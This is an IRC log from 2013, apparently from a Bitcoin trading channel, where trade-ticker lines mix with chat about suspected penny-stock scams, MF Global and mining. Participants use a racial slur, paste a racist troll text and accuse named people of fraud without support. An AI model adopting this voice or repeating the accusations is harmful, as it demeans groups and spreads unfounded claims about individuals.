[BTCTC] [LABCOIN] 800 @ 0.003699 = 2.9592 BTC [-] Sep 10 02:11:57 [BTCTC] [LABCOIN] 100 @ 0.003699 = 0.3699 BTC [-] Sep 10 02:12:20 [BTCTC] [LABCOIN] 100 @ 0.003699 = 0.3699 BTC [-] Sep 10 02:13:16 [BTCTC] [LABCOIN] 60 @ 0.00375 = 0.225 BTC [+] Sep 10 02:13:30 [MPEX] [S.MPOE] 6857 @ 0.00089126 = 6.1114 BTC [-] Sep 10 02:13:31 [MPEX] [S.MPOE] 12400 @ 0.00089004 = 11.0365 BTC [-] Sep 10 02:15:15 [BTCTC] [LABCOIN] 24 @ 0.00375 = 0.09 BTC [+] Sep 10 02:17:44 [BTCTC] [DMS.PURCHASE] 6 @ 0.01205 = 0.0723 BTC [+] Sep 10 02:18:15 [BTCTC] [LABCOIN] 40 @ 0.00375 = 0.15 BTC [+] Sep 10 02:19:30 [BTCTC] [LABCOIN] 1 @ 0.00375 BTC [+] Sep 10 02:20:14 [MPEX] [S.MPOE] 2200 @ 0.0008886 = 1.9549 BTC [-] Sep 10 02:20:50 [BTCTC] [LABCOIN] 10 @ 0.00375 = 0.0375 BTC [+] Sep 10 02:21:48 [BTCTC] [LABCOIN] 100 @ 0.00375 = 0.375 BTC [+] Sep 10 02:24:52 [BTCTC] [LABCOIN] 10 @ 0.00375 = 0.0375 BTC [+] Sep 10 02:25:08 [BTCTC] [LABCOIN] 1500 @ 0.00375 = 5.625 BTC [+] Sep 10 02:26:32 [BTCTC] [LABCOIN] 685 @ 0.00375 = 2.5688 BTC [+] Sep 10 02:26:34 [BTCTC] [LABCOIN] 100 @ 0.003758 = 0.3758 BTC [+] Sep 10 02:26:35 [BTCTC] [LABCOIN] 8215 @ 0.0038 = 31.217 BTC [+] Sep 10 02:27:36 [BTCTC] [LABCOIN] 1297 @ 0.0038 = 4.9286 BTC [+] Sep 10 02:27:37 [BTCTC] [LABCOIN] 30 @ 0.0038 = 0.114 BTC [+] Sep 10 02:27:39 [BTCTC] [LABCOIN] 10 @ 0.0038 = 0.038 BTC [+] Sep 10 02:28:09 [BTCTC] [LABCOIN] 500 @ 0.00385 = 1.925 BTC [+] Sep 10 02:28:10 [BTCTC] [LABCOIN] 500 @ 0.00385 = 1.925 BTC [+] Sep 10 02:28:12 [BTCTC] [LABCOIN] 882 @ 0.00385 = 3.3957 BTC [+] Sep 10 02:28:13 [BTCTC] [LABCOIN] 1500 @ 0.00387 = 5.805 BTC [+] Sep 10 02:28:14 [BTCTC] [LABCOIN] 5000 @ 0.003888 = 19.44 BTC [+] Sep 10 02:28:14 [BTCTC] [LABCOIN] 500 @ 0.003898 = 1.949 BTC [+] Sep 10 02:28:15 [BTCTC] [LABCOIN] 700 @ 0.0039 = 2.73 BTC [+] Sep 10 02:28:16 [BTCTC] [LABCOIN] 3000 @ 0.0039 = 11.7 BTC [+] Sep 10 02:28:17 [BTCTC] [LABCOIN] 500 @ 0.003924 = 1.962 BTC [+] Sep 10 02:28:18 [BTCTC] [LABCOIN] 789 @ 0.003944 = 3.1118 BTC [+] Sep 10 02:28:19 [BTCTC] [LABCOIN] 500 @ 0.003951 = 1.9755 BTC [+] Sep 10 02:28:21 [BTCTC] [LABCOIN] 3061 @ 0.003967 = 12.143 BTC [+] Sep 10 02:28:21 bullshit Sep 10 02:28:22 [BTCTC] [LABCOIN] 954 @ 0.00397 = 3.7874 BTC [+] Sep 10 02:28:23 [BTCTC] [LABCOIN] 250 @ 0.003978 = 0.9945 BTC [+] Sep 10 02:28:24 [BTCTC] [LABCOIN] 1500 @ 0.003986 = 5.979 BTC [+] Sep 10 02:28:24 [BTCTC] [LABCOIN] 200 @ 0.003987 = 0.7974 BTC [+] Sep 10 02:28:25 [BTCTC] [LABCOIN] 800 @ 0.003987 = 3.1896 BTC [+] Sep 10 02:28:26 [BTCTC] [LABCOIN] 130 @ 0.003987 = 0.5183 BTC [+] Sep 10 02:28:27 [BTCTC] [LABCOIN] 1000 @ 0.003988 = 3.988 BTC [+] Sep 10 02:28:28 [BTCTC] [LABCOIN] 30 @ 0.003988 = 0.1196 BTC [+] Sep 10 02:28:29 [BTCTC] [LABCOIN] 1000 @ 0.003988 = 3.988 BTC [+] Sep 10 02:28:30 [BTCTC] [LABCOIN] 5000 @ 0.003988 = 19.94 BTC [+] Sep 10 02:28:30 there it goes Sep 10 02:28:31 [BTCTC] [LABCOIN] 1704 @ 0.003989 = 6.7973 BTC [+] Sep 10 02:28:48 .004? Sep 10 02:29:04 0.0m00n Sep 10 02:29:36 er Sep 10 02:29:38 soo, did every outside holder sell already and is it now just burnside trading with thescamede ? Sep 10 02:29:49 or are there still more shares held by third parties about to get sold ? Sep 10 02:30:01 stay tuned for the mysterious mysteries of the bitcoin's scam exchange!!1 Sep 10 02:30:26 [BTCTC] [LABCOIN] 371 @ 0.003988 = 1.4795 BTC [-] Sep 10 02:31:35 I tend to think burnside is just to naive Sep 10 02:32:09 pankkake that's not an optiopn for running exchanges. Sep 10 02:32:11 [BTCTC] [LABCOIN] 1700 @ 0.00395 = 6.715 BTC [-] Sep 10 02:32:16 it's like saying hitler was naive. dude, it dun matter. Sep 10 02:32:44 I agree it doesn't matter Sep 10 02:32:53 i'm skeptical that if Burnside has all the lawyers he just reported he has, that he's actively scamming Sep 10 02:32:55 but you word it like he's part of some conspiracy Sep 10 02:33:04 ThickAsThieves because why ? Sep 10 02:33:10 [BTCTC] [LABCOIN] 22 @ 0.00395 = 0.0869 BTC [-] Sep 10 02:33:23 pankkake i word it like he's an accessory, which he is. Sep 10 02:33:32 well it is unclear Sep 10 02:33:35 cluelessness is no defense, and it won't be provable in the best of cases. Sep 10 02:33:49 [BTCTC] [LABCOIN] 100 @ 0.003711 = 0.3711 BTC [-] Sep 10 02:34:02 Burnside reports that he's been acclimating his lawyers heavily to all the software and goings-on of BTCT.co Sep 10 02:34:42 [BTCTC] [LABCOIN] 3196 @ 0.00395 = 12.6242 BTC [+] Sep 10 02:36:23 ThickAsThieves MF Global had plenty of lawyers. Sep 10 02:36:25 [BTCTC] [LABCOIN] 100 @ 0.003949 = 0.3949 BTC [-] Sep 10 02:36:26 [BTCTC] [LABCOIN] 82 @ 0.00395 = 0.3239 BTC [+] Sep 10 02:36:27 [BTCTC] [LABCOIN] 48 @ 0.003987 = 0.1914 BTC [+] Sep 10 02:37:02 at hitler had mad tanks much props to my nigga Sep 10 02:37:11 at = and Sep 10 02:37:13 me and my assumptions I guess... Sep 10 02:37:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.022 = 1.1 BTC [-] Sep 10 02:38:26 [BTCTC] [LABCOIN] 5 @ 0.003987 = 0.0199 BTC [+] Sep 10 02:39:17 [BTCTC] [LABCOIN] 2 @ 0.003986 = 0.008 BTC [-] Sep 10 02:39:47 [BTCTC] [TAT.ASICMINER] 5 @ 0.02172 = 0.1086 BTC [-] Sep 10 02:39:49 [BTCTC] [TAT.ASICMINER] 6 @ 0.02172 = 0.1303 BTC [-] Sep 10 02:39:55 lawyers are like swiss army knives Sep 10 02:40:19 they both have no soul? Sep 10 02:40:40 a real knife always works better? Sep 10 02:41:08 depends rly Sep 10 02:41:08 [BTCTC] [DMS.MINING] 10 @ 0.002744 = 0.0274 BTC [+] Sep 10 02:41:19 [BTCTC] [LABCOIN] 3986 @ 0.003755 = 14.9674 BTC [-] Sep 10 02:41:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.0217 BTC [-] Sep 10 02:41:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0217 BTC [-] Sep 10 02:41:57 [BTCTC] [LABCOIN] 998 @ 0.003986 = 3.978 BTC [+] Sep 10 02:41:58 [BTCTC] [LABCOIN] 100 @ 0.003986 = 0.3986 BTC [+] Sep 10 02:41:59 [BTCTC] [LABCOIN] 1947 @ 0.003987 = 7.7627 BTC [+] Sep 10 02:42:01 [BTCTC] [LABCOIN] 1000 @ 0.003988 = 3.988 BTC [+] Sep 10 02:42:02 [BTCTC] [LABCOIN] 1000 @ 0.003988 = 3.988 BTC [+] Sep 10 02:42:03 [BTCTC] [LABCOIN] 2635 @ 0.003989 = 10.511 BTC [+] Sep 10 02:42:06 sometimes im like..my mom's laywer is da man..other times im like...he's aiight. Sep 10 02:42:17 [BTCTC] [DMS.MINING] 2 @ 0.002745 = 0.0055 BTC [+] Sep 10 02:42:18 got a lot to learn from our parents rly Sep 10 02:42:21 and some other times he's doing her ? Sep 10 02:43:30 maybe back in the 80s Sep 10 02:43:32 idk Sep 10 02:43:42 [BTCTC] [TAT.ASICMINER] 31 @ 0.02163 = 0.6705 BTC [-] Sep 10 02:43:57 [BTCTC] [LABCOIN] 3 @ 0.00395 = 0.0119 BTC [-] Sep 10 02:44:02 its all cool though cuz my dad was a pimp..military and ladies man...he got his i know this Sep 10 02:44:33 [BTCTC] [DMS.MINING] 26 @ 0.002745 = 0.0714 BTC [+] Sep 10 02:44:52 lawyers..they're scumbags but i respect thier biz..you want one. Sep 10 02:45:24 or more depending on how dirty you are...they OK in by me Sep 10 02:46:00 i guess there's a rap song in there somewhere Sep 10 02:46:11 always more on the suface than it seems i've foundl. Sep 10 02:46:16 he is KRS1 after all Sep 10 02:46:32 [BTCTC] [LABCOIN] 1074 @ 0.003758 = 4.0361 BTC [-] Sep 10 02:46:34 [BTCTC] [LABCOIN] 5 @ 0.003757 = 0.0188 BTC [-] Sep 10 02:46:35 [BTCTC] [LABCOIN] 32 @ 0.003756 = 0.1202 BTC [-] Sep 10 02:46:52 seriosuly tho, 4 minutes about how the rapper;'s mom lawyer was sometimes the man and sometimes aight, he banged her but so what his dad was a pimp Sep 10 02:47:09 and they're all good you need one more of them on the surface than deep down. Sep 10 02:47:16 sorta like emo-pop-rap fusion. Sep 10 02:47:20 dub could produce it. Sep 10 02:47:28 shit taken out of context can be taken too far too Sep 10 02:47:41 yeh Sep 10 02:48:13 KRS1 well art transfigures reality ya kno. Sep 10 02:48:58 mp did you end up listening to that audio reel i sent Sep 10 02:49:09 yes it does Sep 10 02:49:10 which one was that ? Sep 10 02:49:16 [BTCTC] [LABCOIN] 70 @ 0.00376 = 0.2632 BTC [+] Sep 10 02:49:17 jeez the shillage on the forum is crazy. Sep 10 02:49:17 [BTCTC] [LABCOIN] 210 @ 0.003759 = 0.7894 BTC [-] Sep 10 02:49:18 [BTCTC] [LABCOIN] 1099 @ 0.003757 = 4.1289 BTC [-] Sep 10 02:50:07 twas an mp3 link I sent of snippets of songs i produced Sep 10 02:50:14 hip-hop stuffs Sep 10 02:50:16 [BTCTC] [LABCOIN] 1099 @ 0.003757 = 4.1289 BTC [-] Sep 10 02:50:38 yeah. i'm not much of an authority on the topic tho. Sep 10 02:50:56 word Sep 10 02:51:03 it's okay to say you hated it Sep 10 02:51:06 :) Sep 10 02:51:11 i didn't hate it lol, i'd have said Sep 10 02:51:12 i didn Sep 10 02:51:18 't much have an opinion either way, is the truth. Sep 10 02:51:31 word Sep 10 02:51:38 [BTCTC] [LABCOIN] 1522 @ 0.003756 = 5.7166 BTC [-] Sep 10 02:51:47 you ever went into an art gallery and went hmmm... well maybe this is how it's supposed to be, really ? Sep 10 02:52:06 i get bored at galleries Sep 10 02:52:21 it's like you can appreciate the skill for about 10min Sep 10 02:52:26 then it's like, okay i get it Sep 10 02:52:27 so you get bored and flirt. well used time. Sep 10 02:52:43 On October 31, 2011, MF Global executives admitted that transfer of $700 million from customer accounts to the broker-dealer and a loan of $175 million in customer funds to MF Global’s U.K. subsidiary to cover (or mask) liquidity shortfalls at the company occurred on October 28, 2011. MF could not repay these monies with its own funds. Improper co-mingling, or mixing, of company and client funds took place for days b Sep 10 02:52:43 efore the illicit transfer and loans – and perhaps many other days earlier in the year. According the New York Times, "MF Global dipped again and again into customer funds to meet the demands", perhaps beginning as early as August 2011. Sep 10 02:52:50 MF Global declared bankruptcy on October 31, 2011, and faced liquidation beginning in November 2011. Sep 10 02:52:50 According to a trustee liquidating the company after its collapse, the losses incurred by customers of MF Global stood at $1.6 billion because of the debacle as of April 2012. The vast majority of these funds have not been returned to customers. Sep 10 02:52:53 never forget! Sep 10 02:54:19 wow Sep 10 02:54:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02297 BTC [+] Sep 10 02:54:50 motherfucker global Sep 10 02:54:56 indeed Sep 10 02:55:10 [BTCTC] [DMS.MINING] 1 @ 0.002745 BTC [+] Sep 10 02:55:15 [BTCTC] [LABCOIN] 3000 @ 0.00376 = 11.28 BTC [+] Sep 10 02:55:16 [BTCTC] [LABCOIN] 593 @ 0.003758 = 2.2285 BTC [-] Sep 10 02:55:17 [BTCTC] [LABCOIN] 5 @ 0.003757 = 0.0188 BTC [-] Sep 10 02:55:18 [BTCTC] [LABCOIN] 1446 @ 0.003756 = 5.4312 BTC [-] Sep 10 02:55:19 [BTCTC] [LABCOIN] 330 @ 0.003755 = 1.2392 BTC [-] Sep 10 02:55:20 [BTCTC] [LABCOIN] 2 @ 0.003659 = 0.0073 BTC [-] Sep 10 02:55:21 [BTCTC] [LABCOIN] 7 @ 0.003658 = 0.0256 BTC [-] Sep 10 02:55:23 [BTCTC] [LABCOIN] 33 @ 0.003656 = 0.1206 BTC [-] Sep 10 02:55:24 [BTCTC] [LABCOIN] 100 @ 0.003655 = 0.3655 BTC [-] Sep 10 02:55:25 [BTCTC] [LABCOIN] 778 @ 0.003652 = 2.8413 BTC [-] Sep 10 02:55:26 [BTCTC] [LABCOIN] 1500 @ 0.003652 = 5.478 BTC [-] Sep 10 02:55:27 [BTCTC] [LABCOIN] 1000 @ 0.003651 = 3.651 BTC [-] Sep 10 02:55:27 [BTCTC] [LABCOIN] 2000 @ 0.00365 = 7.3 BTC [-] Sep 10 02:55:28 [BTCTC] [LABCOIN] 3423 @ 0.003629 = 12.4221 BTC [-] Sep 10 02:55:29 [BTCTC] [LABCOIN] 1250 @ 0.003628 = 4.535 BTC [-] Sep 10 02:55:30 [BTCTC] [LABCOIN] 11521 @ 0.003628 = 41.7982 BTC [-] Sep 10 02:55:31 [BTCTC] [LABCOIN] 1000 @ 0.003627 = 3.627 BTC [-] Sep 10 02:55:33 [BTCTC] [LABCOIN] 2018 @ 0.003625 = 7.3153 BTC [-] Sep 10 02:55:41 pankkake it's remarkably well kept under wraps for what a huge fucking scandal it was. Sep 10 02:57:04 "That was over 60K shares bought vs 5K shares sold. I wouldn't call that a great dump." Sep 10 02:57:14 famous forumer last words. Sep 10 03:00:00 im going swimming..south florida style...i'll check with you bitches later...time to relax =D Sep 10 03:02:46 mircea_popescu: is this great man part of your family? http://www.metal-archives.com/artists/Sol_Faur/571 Sep 10 03:03:10 not afaik. Sep 10 03:03:33 dude plays the dulcimer ?! Sep 10 03:03:51 I don't even know what that is Sep 10 03:04:18 weird ozarks guitar-like thing Sep 10 03:07:33 [BTCTC] [LABCOIN] 110 @ 0.003628 = 0.3991 BTC [+] Sep 10 03:07:38 dulcimer is pretty cool Sep 10 03:07:54 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.0006 = 0.003 BTC [-] Sep 10 03:08:04 [HAVELOCK] [LABCO] 19 @ 0.003599 = 0.0684 BTC [+] Sep 10 03:10:56 [HAVELOCK] [XBOND] 4 @ 0.0011251 = 0.0045 BTC [+] Sep 10 03:11:35 I think we're overdue for a massive LC dump again. Sep 10 03:11:37 kakobrekla muricans claim it's "invented by scottish/irish imigrants tho it doesn't exist in scotland/ireland" Sep 10 03:11:42 fucktards never heard of bohemia. Sep 10 03:12:49 heh Sep 10 03:17:20 dexX7 so what do you make of the labcoin ip thing ? Sep 10 03:18:28 http://blockchain.info/es/blocks/98.226.88.30 Sep 10 03:18:29 Bloques recientes resueltos por 98.226.88.30 Sep 10 03:19:12 not sure Sep 10 03:19:58 it's a linode ip you see ? it gets randomly allocated to customers. Sep 10 03:20:19 of course why would anyone in bitcoin be stupid enough to use linode after the bitcoinica/slush hack they pulled is beyond me Sep 10 03:20:28 then again, scammers rarely bother to learn the history. Sep 10 03:22:22 it doesn't mean the node has bitcoins in it Sep 10 03:23:03 well, what does it mean? someone has a node running at linode and labcoin.com is hosted there, right? Sep 10 03:23:11 pankkake supposedly the ip was relying labcoin mined blocks Sep 10 03:23:28 oh… meh Sep 10 03:23:32 myeah. Sep 10 03:23:42 I use a node to relay my local transactions Sep 10 03:23:52 dexX7 someone HAd a node, closed their acct, labcoin opened an account cause its cheap Sep 10 03:23:57 and randomly got the ip allocated to them Sep 10 03:24:02 and even then, while it's well connected, blockchain.info fails to recognize the transaction origin Sep 10 03:24:03 i see Sep 10 03:24:05 mircea_popescu: Sep 10 03:24:06 no Sep 10 03:24:20 khalunis pls to add words. Sep 10 03:24:22 https://blockchain.info/tx/e1a7215ee507c69b5bd260306ee8e7f4fe0a1b3d8c23c0e244d2447af263faad "/P2SH/ /ozcoin/stratum/ " Sep 10 03:24:24 Bitcoin Transaction e1a7215ee507c69b5bd260306ee8e7f4fe0a1b3d8c23c0e244d2447af263faad Sep 10 03:25:09 who is 98.226.88.30? Sep 10 03:25:50 dexX7 well basically people are going around through the unknown block submitters list allocating ips to the various forum scams Sep 10 03:25:56 cause who's to know Sep 10 03:26:49 khalunis: anything more to your "no"? Sep 10 03:26:59 [HAVELOCK] [XBOND] 351 @ 0.0011251 = 0.3949 BTC [+] Sep 10 03:27:13 [HAVELOCK] [XBOND] 965 @ 0.00112511 = 1.0857 BTC [+] Sep 10 03:28:01 98.226.88.30 is a well connected node that relays transactions Sep 10 03:28:34 if blockchain.info had their shit together they would tag more blocks properly not just by "relayed by" Sep 10 03:28:49 [HAVELOCK] [XBOND] 83 @ 0.00112512 = 0.0934 BTC [+] Sep 10 03:28:53 [HAVELOCK] [XBOND] 20 @ 0.00113 = 0.0226 BTC [+] Sep 10 03:28:55 [HAVELOCK] [XBOND] 20 @ 0.00114 = 0.0228 BTC [+] Sep 10 03:28:58 [HAVELOCK] [XBOND] 370 @ 0.001144 = 0.4233 BTC [+] Sep 10 03:29:00 [HAVELOCK] [XBOND] 1660 @ 0.001145 = 1.9007 BTC [+] Sep 10 03:29:02 [HAVELOCK] [XBOND] 1 @ 0.00114666 BTC [+] Sep 10 03:29:03 [HAVELOCK] [XBOND] 20 @ 0.001149 = 0.023 BTC [+] Sep 10 03:29:05 [HAVELOCK] [XBOND] 20 @ 0.00114996 = 0.023 BTC [+] Sep 10 03:29:06 remember they are a private business, they dont make money off getting stats right Sep 10 03:29:07 [HAVELOCK] [XBOND] 65 @ 0.00114999 = 0.0747 BTC [+] Sep 10 03:29:09 [HAVELOCK] [XBOND] 3824 @ 0.00115 = 4.3976 BTC [+] Sep 10 03:29:18 Graet word. Sep 10 03:29:31 I opened a few unknown blocks, they were all ghash.io according to the coinbase Sep 10 03:30:04 bitfury is doing a lot of hashing these days it seems. Sep 10 03:30:11 more than AM actually Sep 10 03:30:12 possibly the new king of asics. Sep 10 03:30:14 yeah. Sep 10 03:30:21 [HAVELOCK] [XBOND] 242 @ 0.00115 = 0.2783 BTC [+] Sep 10 03:30:26 apparently the chips are actually very good. Sep 10 03:30:30 ie, best on market atm. Sep 10 03:30:42 and their hardware is great. if I had the money I probably would buy one for fun Sep 10 03:31:05 not really for the chips, but the whole autonomous blade system Sep 10 03:31:28 i have the money but i can't be bothered with mining. Sep 10 03:31:56 using a raspberry pi, a small linux distro Sep 10 03:32:06 well I'm a tinkerer and I like hardware Sep 10 03:32:26 ghash.io has this funny feature Sep 10 03:32:38 of having 'shareholders' for an account Sep 10 03:32:49 ;) Sep 10 03:32:55 lol Sep 10 03:33:22 [BTCTC] [LABCOIN] 1 @ 0.0038 BTC [+] Sep 10 03:33:42 brb starting a pmb so they can sponsor my lust for cool stuff Sep 10 03:34:35 [BTCTC] [DMS.MINING] 1 @ 0.002745 BTC [+] Sep 10 03:35:38 [BTCTC] [LABCOIN] 3990 @ 0.003799 = 15.158 BTC [-] Sep 10 03:35:39 [BTCTC] [LABCOIN] 3985 @ 0.0038 = 15.143 BTC [+] Sep 10 03:37:22 [BTCTC] [DMS.MINING] 28 @ 0.002745 = 0.0769 BTC [+] Sep 10 03:42:09 [HAVELOCK] [XBOND] 4 @ 0.0011456 = 0.0046 BTC [-] Sep 10 03:42:12 [HAVELOCK] [XBOND] 2 @ 0.00114567 = 0.0023 BTC [+] Sep 10 03:42:14 [HAVELOCK] [XBOND] 1730 @ 0.00115 = 1.9895 BTC [+] Sep 10 03:42:15 [HAVELOCK] [XBOND] 264 @ 0.00115 = 0.3036 BTC [+] Sep 10 03:46:51 [BTCTC] [ASICMINER-PT] 1 @ 2.494 BTC [-] Sep 10 03:47:20 [BTCTC] [LABCOIN] 2 @ 0.003794 = 0.0076 BTC [-] Sep 10 03:47:42 [BTCTC] [LABCOIN] 5 @ 0.003795 = 0.019 BTC [+] Sep 10 03:49:14 dude labcoin! TO THE MOON!!!1eeleven Sep 10 03:49:53 strange trades Sep 10 03:50:16 on the forum the guys are confusing relayed transactions with mined blocks Sep 10 03:50:33 pankkake who's that bargraphics character anyway ? Sep 10 03:50:37 I don't even know what to say Sep 10 03:51:03 I don't know, he seems more reasonable now that a few days ago at least… Sep 10 03:51:58 ic Sep 10 03:52:20 [HAVELOCK] [AM100] 1 @ 0.02319588 BTC [+] Sep 10 03:54:19 https://bitcointalk.org/index.php?topic=252531.msg3083645#msg3083645 Sep 10 03:54:25 [ActiveMining] The Official Active Mining Discussion Thread Sep 10 03:55:01 as far as i know he really does trade those amounts Sep 10 03:55:36 oh that was https://bitcointalk.org/index.php?topic=252531.msg3083065#msg3083065 Sep 10 03:55:39 ugh Sep 10 03:56:17 so he's a guy trading on 1k btc. good for him. Sep 10 03:56:39 "Everyone involved in this use known and real identities linked. Oh and they are china. Do you know what happens to people commit financial fraud in china? They get executed. I highly doubt this is a scam on that information alone." Sep 10 03:56:44 omg Sep 10 03:57:25 lolk Sep 10 03:57:39 chinese people never lie because they get executed. Sep 10 03:58:49 and in the meantime they extort yifu Sep 10 03:59:43 im pretty sure the execution thing is strictly the result of delapidating govt funds Sep 10 04:00:06 and paying back is an acceptable defense. Sep 10 04:02:45 [BTCTC] [LABCOIN] 40 @ 0.003897 = 0.1559 BTC [+] **** BEGIN LOGGING AT Tue Sep 10 04:29:58 2013 Sep 10 04:30:25 [BTCTC] [LABCOIN] 5 @ 0.003801 = 0.019 BTC [+] Sep 10 04:30:26 [BTCTC] [LABCOIN] 95 @ 0.003802 = 0.3612 BTC [+] Sep 10 04:37:38 [BTCTC] [LABCOIN] 5 @ 0.003748 = 0.0187 BTC [-] Sep 10 04:37:39 [BTCTC] [LABCOIN] 8 @ 0.003749 = 0.03 BTC [+] Sep 10 04:37:40 mightaswellswollow Sep 10 04:37:59 swa. Sep 10 04:38:05 g Sep 10 04:38:34 twerk mircea twerk Sep 10 04:38:41 [BTCTC] [LABCOIN] 1992 @ 0.003749 = 7.468 BTC [+] Sep 10 04:38:54 I read that as might as well swallow at first Sep 10 04:39:17 oh i'm behind on that obv Sep 10 04:39:26 [BTCTC] [LABCOIN] 280 @ 0.00375 = 1.05 BTC [+] Sep 10 04:40:02 there's no anonymous bitcoin board? maybe I should make one Sep 10 04:40:13 [BTCTC] [LABCOIN] 10 @ 0.003749 = 0.0375 BTC [-] Sep 10 04:40:17 what'd that be ? Sep 10 04:40:30 just a bitcointalk where people are anonymous Sep 10 04:41:06 [BTCTC] [LABCOIN] 3 @ 0.003749 = 0.0112 BTC [-] Sep 10 04:41:14 well bitbet is afaik the closest to that. Sep 10 04:41:16 trolltalk Sep 10 04:41:23 with its chan-y username thing Sep 10 04:41:27 yeah Sep 10 04:41:47 I discovered it's easy to create and delete reddit accounts Sep 10 04:42:04 so now when I need to write stuff on it, I create, write, delete Sep 10 04:42:26 [BTCTC] [DMS.MINING] 24 @ 0.002774 = 0.0666 BTC [+] Sep 10 04:42:28 [BTCTC] [DMS.MINING] 326 @ 0.002775 = 0.9047 BTC [+] Sep 10 04:42:39 "need". Sep 10 04:42:40 [BTCTC] [BASIC-MINING] 1 @ 0.1299 BTC [+] Sep 10 04:42:53 well… "someone is wrong is on the internet" syndrome Sep 10 04:42:54 ThickAsThieves you actually old enough to have been on 20721 ?! Sep 10 04:43:19 nah Sep 10 04:43:24 just know of it Sep 10 04:43:29 i checked out some 4chan Sep 10 04:43:30 [BTCTC] [TAT.ASICMINER] 15 @ 0.0225 = 0.3375 BTC [-] Sep 10 04:43:34 never pulled me in Sep 10 04:43:37 well Sep 10 04:43:39 i am old enough Sep 10 04:43:44 just not my world Sep 10 04:43:57 i was trolling BBS bro Sep 10 04:43:59 [BTCTC] [ASICMINER-PT] 1 @ 2.436 BTC [-] Sep 10 04:43:59 [BTCTC] [ASICMINER-PT] 3 @ 2.435 = 7.305 BTC [-] Sep 10 04:44:01 [BTCTC] [ASICMINER-PT] 3 @ 2.427 = 7.281 BTC [-] Sep 10 04:44:02 [BTCTC] [ASICMINER-PT] 1 @ 2.426 BTC [-] Sep 10 04:44:03 [BTCTC] [ASICMINER-PT] 2 @ 2.42 = 4.84 BTC [-] Sep 10 04:44:04 hehe Sep 10 04:44:04 [BTCTC] [ASICMINER-PT] 2 @ 2.405 = 4.81 BTC [-] Sep 10 04:44:05 [BTCTC] [ASICMINER-PT] 1 @ 2.402 BTC [-] Sep 10 04:44:06 [BTCTC] [ASICMINER-PT] 4 @ 2.401 = 9.604 BTC [-] Sep 10 04:44:07 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Sep 10 04:44:08 [BTCTC] [ASICMINER-PT] 2 @ 2.4 = 4.8 BTC [-] Sep 10 04:44:17 prodigy network Sep 10 04:44:18 etc Sep 10 04:44:31 mad QBASIC skills Sep 10 04:44:32 ic Sep 10 04:44:36 lol mad qbasic skills Sep 10 04:44:39 hehe Sep 10 04:44:45 did you make the gorillas throw penises ? Sep 10 04:45:44 no, but that reminds me of the time my mom found my dithered print out of nudie sluts with a banana Sep 10 04:46:25 the days between dot matrix and 300dpi Sep 10 04:46:50 she was like what's this?! and well, that was the end of it Sep 10 04:49:03 if only people had where to ipo the laser printer, those two weeks between dot matrix and 300 dpi would have passed a lot easier. Sep 10 04:49:30 https://bitcointalk.org/index.php?topic=291274.msg3118756#msg3118756 << Sep 10 04:49:34 Hey Activeminers? You won't make your investment back. Sep 10 04:49:43 people exist irl ? "ready-made swath of dubious evidence" Sep 10 04:49:48 that forum is so baws by now. Sep 10 04:50:18 ugh Sep 10 04:50:25 somewhere in america Sep 10 04:50:35 formers are twerking Sep 10 04:50:42 forumers* Sep 10 04:51:08 i think the one thing that really burns everyone else on the internet Sep 10 04:51:14 is just how fucking endless our supply of lols is. Sep 10 04:51:19 i mean... nobody can even come close. Sep 10 04:51:41 lol. there goes another one Sep 10 04:51:45 farmers* Sep 10 04:52:24 i shall now quote all of bitcointalk in integrum. please avert your eyes and hide the children. Sep 10 04:52:37 Pseudo-thought-provoking non-statement! Sep 10 04:52:37 Am deeply disturbed by amount of attention NOT BEING PAID TO MAY!. Am the cleverest of the clevar, will prove it by clevarly misspelling words INTENTIONALLAY. How clevar I am! Sep 10 04:52:37 Have noticed that 'Slashdot Troll Scene', in addition to being a figment of own imagination, hums merrily along in autonomous fashion. Like negro who kills own friend in ghetto rather than killing white banker, am unable to see past own seething envy-driven rage. Too blinded to attack The Real Enemay. Lashing out at those around me! In own defective, rat-laden mind, own friends and equals represent all-consuming evil, Sep 10 04:52:37 yes, just like WHOLE WORALD. Sep 10 04:52:37 Insightful ad-hominem attack! Breathtaking revalation about troll non-person/persona XXXXXXXX! Fear struck into heart of XXXXXXX via super-CLEVAR techniques of using INTERNAT WEB PAGES to lookup REVEALING PERSONAL INFARMASHAN ABOUT XXXXXXX. XXXXXXX has a real name and a real life that can be ridiculed! From a vaporous, phantasmal, non-existent basis for comparison, I STAB AT THAA! Own worst fear of being DISCOVERED to Sep 10 04:52:37 be a LONELY COMPUTER USER projected onto non-person/persona XXXXXXXXX! Sep 10 04:52:37 Attempt to tear down non-organizations by insinuation of non-associations between psuedo-personalities! Exhortment to not obey fictional organizations YYYYYYYY and BLAHBLEH! Sep 10 04:52:37 Ridiculous pronouncement! Hand-waving, followed by insinuation that events of actual import will take place! Events wrapped in stinking pseudo-mantle of meta-authenticity by citing of dates, number, facts, figures, and other babblefacts. Added aura of authenticity: The date is blahblah! There will be blahblah things happening on blahblah for blahblah! This but a walking shadow, a tale told by a nonexistent being, full Sep 10 04:52:37 of blah and blah, signifying NOTHANG. Sep 10 04:52:37 Failure to realize that it's all a joke, Sep 10 04:52:37 --Introverted Lonely Passive-Agressive Young White Male Sep 10 04:52:52 the MPOE-PR myth is fun, I would't try to debunk it Sep 10 04:53:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.02265 = 0.3398 BTC [+] Sep 10 04:53:01 pankkake if she never tried it'd prolly died. Sep 10 04:53:09 it'd prolly have died by now* Sep 10 04:54:30 [BTCTC] [LABCOIN] 2 @ 0.003681 = 0.0074 BTC [-] Sep 10 04:56:00 [BTCTC] [ACTIVEMINING] 2 @ 0.003381 = 0.0068 BTC [-] Sep 10 04:56:02 [BTCTC] [ACTIVEMINING] 21 @ 0.003353 = 0.0704 BTC [-] Sep 10 04:56:08 mircea_popescu: that is superb Sep 10 04:56:21 [BTCTC] [LABCOIN] 333 @ 0.003681 = 1.2258 BTC [-] Sep 10 04:56:21 [BTCTC] [LABCOIN] 969 @ 0.00368 = 3.5659 BTC [-] Sep 10 04:56:23 khalunis ed has matured nicely since last decade. Sep 10 04:57:23 [BTCTC] [CB.IDIFF-O] 20 @ 0.00989 = 0.1978 BTC [-] Sep 10 04:58:17 [BTCTC] [LABCOIN] 450 @ 0.003743 = 1.6844 BTC [+] Sep 10 04:58:18 